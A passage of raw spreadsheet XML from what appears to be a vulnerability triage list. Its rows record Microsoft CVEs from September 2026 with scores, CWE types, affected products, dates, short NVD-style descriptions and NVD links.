t="inlineStr"><is><t>New</t></is></c><c r="C171" s="5" t="inlineStr"><is><t>CVE-2026-69712</t></is></c><c r="D171" s="5" t="n"><v>8.800000000000001</v></c><c r="E171" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F171" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G171" s="5" t="inlineStr" /><c r="H171" s="5" t="n"><v>0.008999999999999999</v></c><c r="I171" s="5" t="inlineStr" /><c r="J171" s="5" t="inlineStr" /><c r="K171" s="5" t="inlineStr" /><c r="L171" s="5" t="inlineStr" /><c r="M171" s="5" t="inlineStr" /><c r="N171" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O171" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P171" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q171" s="5" t="inlineStr" /><c r="R171" s="5" t="inlineStr"><is><t>CWE-416</t></is></c><c r="S171" s="5" t="inlineStr"><is><t>Use after free in Windows Key Distribution Center allows an authorized attacker to execute code over a network.</t></is></c><c r="T171" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69712</t></is></c></row><row r="172"><c r="A172" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B172" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C172" s="5" t="inlineStr"><is><t>CVE-2026-69716</t></is></c><c r="D172" s="5" t="n"><v>8.800000000000001</v></c><c r="E172" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F172" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G172" s="5" t="inlineStr" /><c r="H172" s="5" t="n"><v>0.008999999999999999</v></c><c r="I172" s="5" t="inlineStr" /><c r="J172" s="5" t="inlineStr"><is><t>microsoft:sharepoint</t></is></c><c r="K172" s="5" t="inlineStr"><is><t>microsoft:sharepoint_server</t></is></c><c r="L172" s="5" t="inlineStr" /><c r="M172" s="5" t="inlineStr" /><c r="N172" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O172" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P172" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q172" s="5" t="inlineStr" /><c r="R172" s="5" t="inlineStr"><is><t>CWE-89</t></is></c><c r="S172" s="5" t="inlineStr"><is><t>Improper neutralization of special elements used in an sql command ('sql injection') in Microsoft Office SharePoint allows an authorized attacker to elevate privileges over a network.</t></is></c><c r="T172" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69716</t></is></c></row><row r="173"><c r="A173" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B173" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C173" s="5" t="inlineStr"><is><t>CVE-2026-69722</t></is></c><c r="D173" s="5" t="n"><v>8.800000000000001</v></c><c r="E173" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F173" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G173" s="5" t="inlineStr" /><c r="H173" s="5" t="n"><v>0.008</v></c><c r="I173" s="5" t="inlineStr" /><c r="J173" s="5" t="inlineStr" /><c r="K173" s="5" t="inlineStr"><is><t>microsoft:365_apps, microsoft:microsoft_365, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024, microsoft:word</t></is></c><c r="L173" s="5" t="inlineStr" /><c r="M173" s="5" t="inlineStr" /><c r="N173" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O173" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P173" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q173" s="5" t="inlineStr" /><c r="R173" s="5" t="inlineStr"><is><t>CWE-121</t></is></c><c r="S173" s="5" t="inlineStr"><is><t>Stack-based buffer overflow in Microsoft Office Word allows an unauthorized attacker to execute code over a network.</t></is></c><c r="T173" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69722</t></is></c></row><row r="174"><c r="A174" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B174" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C174" s="5" t="inlineStr"><is><t>CVE-2026-69724</t></is></c><c r="D174" s="5" t="n"><v>8.800000000000001</v></c><c r="E174" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F174" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G174" s="5" t="inlineStr" /><c r="H174" s="5" t="n"><v>0.008</v></c><c r="I174" s="5" t="inlineStr" /><c r="J174" s="5" t="inlineStr"><is><t>microsoft:sharepoint</t></is></c><c r="K174" s="5" t="inlineStr"><is><t>microsoft:sharepoint_server</t></is></c><c r="L174" s="5" t="inlineStr" /><c r="M174" s="5" t="inlineStr" /><c r="N174" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O174" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P174" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q174" s="5" t="inlineStr" /><c r="R174" s="5" t="inlineStr"><is><t>CWE-862</t></is></c><c r="S174" s="5" t="inlineStr"><is><t>Missing authorization in Microsoft Office SharePoint allows an authorized attacker to execute code over a network.</t></is></c><c r="T174" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69724</t></is></c></row><row r="175"><c r="A175" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B175" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C175" s="5" t="inlineStr"><is><t>CVE-2026-69729</t></is></c><c r="D175" s="5" t="n"><v>8.800000000000001</v></c><c r="E175" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F175" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G175" s="5" t="inlineStr" /><c r="H175" s="5" t="n"><v>0.008999999999999999</v></c><c r="I175" s="5" t="inlineStr" /><c r="J175" s="5" t="inlineStr" /><c r="K175" s="5" t="inlineStr" /><c r="L175" s="5" t="inlineStr" /><c r="M175" s="5" t="inlineStr" /><c r="N175" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O175" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P175" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q175" s="5" t="inlineStr" /><c r="R175" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S175" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Windows Credential Providers allows an authorized attacker to execute code over a network.</t></is></c><c r="T175" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69729</t></is></c></row><row r="176"><c r="A176" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B176" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C176" s="5" t="inlineStr"><is><t>CVE-2026-69740</t></is></c><c r="D176" s="5" t="n"><v>8.800000000000001</v></c><c r="E176" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F176" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G176" s="5" t="inlineStr" /><c r="H176" s="5" t="n"><v>0.003</v></c><c r="I176" s="5" t="inlineStr" /><c r="J176" s="5" t="inlineStr" /><c r="K176" s="5" t="inlineStr" /><c r="L176" s="5" t="inlineStr" /><c r="M176" s="5" t="inlineStr" /><c r="N176" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O176" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P176" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q176" s="5" t="inlineStr" /><c r="R176" s="5" t="inlineStr"><is><t>CWE-416</t></is></c><c r="S176" s="5" t="inlineStr"><is><t>Use after free in Windows Hello allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T176" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69740</t></is></c></row><row r="177"><c r="A177" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B177" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C177" s="5" t="inlineStr"><is><t>CVE-2026-69742</t></is></c><c r="D177" s="5" t="n"><v>8.800000000000001</v></c><c r="E177" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F177" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G177" s="5" t="inlineStr" /><c r="H177" s="5" t="n"><v>0.008</v></c><c r="I177" s="5" t="inlineStr" /><c r="J177" s="5" t="inlineStr" /><c r="K177" s="5" t="inlineStr"><is><t>microsoft:365_apps, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024, microsoft:publisher</t></is></c><c r="L177" s="5" t="inlineStr" /><c r="M177" s="5" t="inlineStr" /><c r="N177" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O177" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P177" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q177" s="5" t="inlineStr" /><c r="R177" s="5" t="inlineStr"><is><t>CWE-190</t></is></c><c r="S177" s="5" t="inlineStr"><is><t>Integer overflow or wraparound in Microsoft Office Publisher allows an unauthorized attacker to execute code over a network.</t></is></c><c r="T177" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69742</t></is></c></row><row r="178"><c r="A178" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B178" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C178" s="5" t="inlineStr"><is><t>CVE-2026-69759</t></is></c><c r="D178" s="5" t="n"><v>8.800000000000001</v></c><c r="E178" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F178" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G178" s="5" t="inlineStr" /><c r="H178" s="5" t="n"><v>0.008</v></c><c r="I178" s="5" t="inlineStr" /><c r="J178" s="5" t="inlineStr" /><c r="K178" s="5" t="inlineStr"><is><t>microsoft:365_apps, microsoft:microsoft_365, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024, microsoft:word</t></is></c><c r="L178" s="5" t="inlineStr" /><c r="M178" s="5" t="inlineStr" /><c r="N178" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O178" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P178" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q178" s="5" t="inlineStr" /><c r="R178" s="5" t="inlineStr"><is><t>CWE-121</t></is></c><c r="S178" s="5" t="inlineStr"><is><t>Stack-based buffer overflow in Microsoft Office Word allows an unauthorized attacker to execute code over a network.</t></is></c><c r="T178" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69759</t></is></c></row><row r="179"><c r="A179" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B179" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C179" s="5" t="inlineStr"><is><t>CVE-2026-69764</t></is></c><c r="D179" s="5" t="n"><v>8.800000000000001</v></c><c r="E179" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F179" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G179" s="5" t="inlineStr" /><c r="H179" s="5" t="n"><v>0.008</v></c><c r="I179" s="5" t="inlineStr" /><c r="J179" s="5" t="inlineStr" /><c r="K179" s="5" t="inlineStr"><is><t>microsoft:365_apps, microsoft:office_2016, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024, microsoft:word</t></is></c><c r="L179" s="5" t="inlineStr" /><c r="M179" s="5" t="inlineStr" /><c r="N179" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O179" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P179" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q179" s="5" t="inlineStr" /><c r="R179" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S179" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Microsoft Office Word allows an unauthorized attacker to execute code over a network.</t></is></c><c r="T179" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69764</t></is></c></row><row r="180"><c r="A180" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B180" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C180" s="5" t="inlineStr"><is><t>CVE-2026-69767</t></is></c><c r="D180" s="5" t="n"><v>8.800000000000001</v></c><c r="E180" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F180" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G180" s="5" t="inlineStr" /><c r="H180" s="5" t="n"><v>0.008</v></c><c r="I180" s="5" t="inlineStr" /><c r="J180" s="5" t="inlineStr" /><c r="K180" s="5" t="inlineStr"><is><t>microsoft:365_apps, microsoft:microsoft_365, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024, microsoft:powerpoint</t></is></c><c r="L180" s="5" t="inlineStr" /><c r="M180" s="5" t="inlineStr" /><c r="N180" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O180" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P180" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q180" s="5" t="inlineStr" /><c r="R180" s="5" t="inlineStr"><is><t>CWE-416</t></is></c><c r="S180" s="5" t="inlineStr"><is><t>Use after free in Microsoft Office PowerPoint allows an unauthorized attacker to execute code over a network.</t></is></c><c r="T180" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69767</t></is></c></row><row r="181"><c r="A181" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B181" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C181" s="5" t="inlineStr"><is><t>CVE-2026-69772</t></is></c><c r="D181" s="5" t="n"><v>8.800000000000001</v></c><c r="E181" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F181" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G181" s="5" t="inlineStr" /><c r="H181" s="5" t="n"><v>0.008</v></c><c r="I181" s="5" t="inlineStr" /><c r="J181" s="5" t="inlineStr" /><c r="K181" s="5" t="inlineStr" /><c r="L181" s="5" t="inlineStr" /><c r="M181" s="5" t="inlineStr" /><c r="N181" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O181" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P181" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q181" s="5" t="inlineStr" /><c r="R181" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S181" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Windows Network File System allows an unauthorized attacker to execute code over a network.</t></is></c><c r="T181" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69772</t></is></c></row><row r="182"><c r="A182" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B182" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C182" s="5" t="inlineStr"><is><t>CVE-2026-69778</t></is></c><c r="D182" s="5" t="n"><v>8.800000000000001</v></c><c r="E182" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F182" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G182" s="5" t="inlineStr" /><c r="H182" s="5" t="n"><v>0.008</v></c><c r="I182" s="5" t="inlineStr" /><c r="J182" s="5" t="inlineStr" /><c r="K182" s="5" t="inlineStr"><is><t>microsoft:365_apps, microsoft:access, microsoft:office_2016, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024</t></is></c><c r="L182" s="5" t="inlineStr" /><c r="M182" s="5" t="inlineStr" /><c r="N182" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O182" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P182" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q182" s="5" t="inlineStr" /><c r="R182" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S182" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Microsoft Office Access allows an unauthorized attacker to execute code over a network.</t></is></c><c r="T182" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69778</t></is></c></row><row r="183"><c r="A183" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B183" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C183" s="5" t="inlineStr"><is><t>CVE-2026-69784</t></is></c><c r="D183" s="5" t="n"><v>8.800000000000001</v></c><c r="E183" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F183" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G183" s="5" t="inlineStr" /><c r="H183" s="5" t="n"><v>0.003</v></c><c r="I183" s="5" t="inlineStr" /><c r="J183" s="5" t="inlineStr" /><c r="K183" s="5" t="inlineStr" /><c r="L183" s="5" t="inlineStr" /><c r="M183" s="5" t="inlineStr" /><c r="N183" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O183" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P183" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q183" s="5" t="inlineStr" /><c r="R183" s="5" t="inlineStr"><is><t>CWE-416</t></is></c><c r="S183" s="5" t="inlineStr"><is><t>Use after free in Windows Hello allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T183" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69784</t></is></c></row><row r="184"><c r="A184" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B184" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C184" s="5" t="inlineStr"><is><t>CVE-2026-69797</t></is></c><c r="D184" s="5" t="n"><v>8.800000000000001</v></c><c r="E184" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F184" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="G184" s="5" t="inlineStr" /><c r="H184" s="5" t="n"><v>0.008</v></c><c r="I184" s="5" t="inlineStr" /><c r="J184" s="5" t="inlineStr" /><c r="K184" s="5" t="inlineStr"><is><t>microsoft:365_apps, microsoft:microsoft_365, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024, microsoft:powerpoint</t></is></c><c r="L184" s="5" t="inlineStr" /><c r="M184" s="5" t="inlineStr" /><c r="N184" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O184" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P184" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q184" s="5" t="inlineStr" /><c r="R184" s="5" t="inlineStr"><is><t>CWE-416</t></is></c><c r="S184" s="5" t="inlineStr"><is><t>Use after free in Microsoft Office PowerPoint allows an unauthorized attacker to execute code over a network.</t></is></c><c r="T184" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69797</t></is></c></row><row r="185"><c r="A185" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B185" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C185" s="5" t="inlineStr"><is><t>CVE-2026-69860</t></is></c><c r="D185" s="5" t="n"><v>8.800000000000001</v></c><c r="E185" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F185" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G185" s="5" t="inlineStr" /><c r="H185" s="5" t="n"><v>0.008</v></c><c r="I185" s="5" t="inlineStr" /><c r="J185" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K1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5" s="5" t="inlineStr" /><c r="M185" s="5" t="inlineStr" /><c r="N185" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O185" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P185" s="5" t="inlineStr"><is><t>2026-09-16</t></is></c><c r="Q185" s="5" t="inlineStr" /><c r="R185" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S185" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Windows Imaging Component allows an unauthorized attacker to execute code over a network.</t></is></c><c r="T185" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69860</t></is></c></row><row r="186"><c r="A186" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B186" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C186" s="5" t="inlineStr"><is><t>CVE-2026-70203</t></is></c><c r="D186" s="5" t="n"><v>8.800000000000001</v></c><c r="E186" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F186" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G186" s="5" t="inlineStr" /><c r="H186" s="5" t="n"><v>0.008</v></c><c r="I186" s="5" t="inlineStr" /><c r="J186" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K1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6" s="5" t="inlineStr" /><c r="M186" s="5" t="inlineStr" /><c r="N186" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O186" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P186" s="5" t="inlineStr"><is><t>2026-09-16</t></is></c><c r="Q186" s="5" t="inlineStr" /><c r="R186" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S186" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Windows Media Player allows an unauthorized attacker to execute code over a network.</t></is></c><c r="T186" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-70203</t></is></c></row><row r="187"><c r="A187" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B187" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C187" s="5" t="inlineStr"><is><t>CVE-2026-70351</t></is></c><c r="D187" s="5" t="n"><v>8.800000000000001</v></c><c r="E187" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F187" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G187" s="5" t="inlineStr" /><c r="H187" s="5" t="n"><v>0.008</v></c><c r="I187" s="5" t="inlineStr" /><c r="J187" s="5" t="inlineStr" /><c r="K187" s="5" t="inlineStr" /><c r="L187" s="5" t="inlineStr" /><c r="M187" s="5" t="inlineStr" /><c r="N187" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O187" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P187" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q187" s="5" t="inlineStr" /><c r="R187" s="5" t="inlineStr"><is><t>CWE-122, CWE-190</t></is></c><c r="S187" s="5" t="inlineStr"><is><t>Integer overflow or wraparound in Microsoft WebP Image Extension allows an unauthorized attacker to execute code over a network.</t></is></c><c r="T187" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-70351</t></is></c></row><row r="188"><c r="A188" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B188" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C188" s="5" t="inlineStr"><is><t>CVE-2026-70586</t></is></c><c r="D188" s="5" t="n"><v>8.800000000000001</v></c><c r="E188" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F188" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G188" s="5" t="inlineStr" /><c r="H188" s="5" t="n"><v>0.008</v></c><c r="I188" s="5" t="inlineStr" /><c r="J188" s="5" t="inlineStr" /><c r="K188" s="5" t="inlineStr" /><c r="L188" s="5" t="inlineStr" /><c r="M188" s="5" t="inlineStr" /><c r="N188" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O188" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P188" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q188" s="5" t="inlineStr" /><c r="R188" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S188" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Windows Paint allows an unauthorized attacker to execute code over a network.</t></is></c><c r="T188" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-70586</t></is></c></row><row r="189"><c r="A189" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B189" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C189" s="5" t="inlineStr"><is><t>CVE-2026-71328</t></is></c><c r="D189" s="5" t="n"><v>8.800000000000001</v></c><c r="E189" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F189" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G189" s="5" t="inlineStr" /><c r="H189" s="5" t="n"><v>0.006</v></c><c r="I189" s="5" t="inlineStr" /><c r="J189" s="5" t="inlineStr" /><c r="K189" s="5" t="inlineStr"><is><t>microsoft:.net, microsoft:visual_studio_2022, microsoft:visual_studio_2026, microsoft:windows</t></is></c><c r="L189" s="5" t="inlineStr" /><c r="M189" s="5" t="inlineStr" /><c r="N189" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O189" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P189" s="5" t="inlineStr"><is><t>2026-09-11</t></is></c><c r="Q189" s="5" t="inlineStr" /><c r="R189" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S189" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Visual Studio allows an unauthorized attacker to execute code over a network.</t></is></c><c r="T189" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-71328</t></is></c></row><row r="190"><c r="A190" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B190" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C190" s="5" t="inlineStr"><is><t>CVE-2026-71336</t></is></c><c r="D190" s="5" t="n"><v>8.800000000000001</v></c><c r="E190" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F190" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G190" s="5" t="inlineStr" /><c r="H190" s="5" t="n"><v>0.008999999999999999</v></c><c r="I190" s="5" t="inlineStr" /><c r="J190" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K190" s="5" t="inlineStr"><is><t>microsoft:windows_10_1607, microsoft:windows_10_1809, microsoft:windows_server_2012, microsoft:windows_server_2016, microsoft:windows_server_2019, microsoft:windows_server_2022, microsoft:windows_server_2025</t></is></c><c r="L190" s="5" t="inlineStr" /><c r="M190" s="5" t="inlineStr" /><c r="N190" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O190" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P190" s="5" t="inlineStr"><is><t>2026-09-16</t></is></c><c r="Q190" s="5" t="inlineStr" /><c r="R190" s="5" t="inlineStr"><is><t>CWE-190</t></is></c><c r="S190" s="5" t="inlineStr"><is><t>Integer overflow or wraparound in Windows Work Folder Service allows an authorized attacker to execute code over a network.</t></is></c><c r="T190" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-71336</t></is></c></row><row r="191"><c r="A191" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B191" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C191" s="5" t="inlineStr"><is><t>CVE-2026-71352</t></is></c><c r="D191" s="5" t="n"><v>8.800000000000001</v></c><c r="E191" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F191" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G191" s="5" t="inlineStr" /><c r="H191" s="5" t="n"><v>0.007</v></c><c r="I191" s="5" t="inlineStr" /><c r="J191" s="5" t="inlineStr" /><c r="K191" s="5" t="inlineStr" /><c r="L191" s="5" t="inlineStr" /><c r="M191" s="5" t="inlineStr" /><c r="N191" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O191" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P191" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q191" s="5" t="inlineStr" /><c r="R191" s="5" t="inlineStr"><is><t>CWE-191</t></is></c><c r="S191" s="5" t="inlineStr"><is><t>Integer underflow (wrap or wraparound) in Windows Remote Access Connection Manager allows an authorized attacker to execute code over a network.</t></is></c><c r="T191" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-71352</t></is></c></row><row r="192"><c r="A192" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B192" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C192" s="5" t="inlineStr"><is><t>CVE-2026-72933</t></is></c><c r="D192" s="5" t="n"><v>8.800000000000001</v></c><c r="E192" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F192" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G192" s="5" t="inlineStr" /><c r="H192" s="5" t="n"><v>0.008</v></c><c r="I192" s="5" t="inlineStr" /><c r="J192" s="5" t="inlineStr" /><c r="K192" s="5" t="inlineStr" /><c r="L192" s="5" t="inlineStr" /><c r="M192" s="5" t="inlineStr" /><c r="N192" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O192" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P192" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q192" s="5" t="inlineStr" /><c r="R192" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S192" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Microsoft WDAC OLE DB provider for SQL allows an unauthorized attacker to execute code over a network.</t></is></c><c r="T192" s="6" 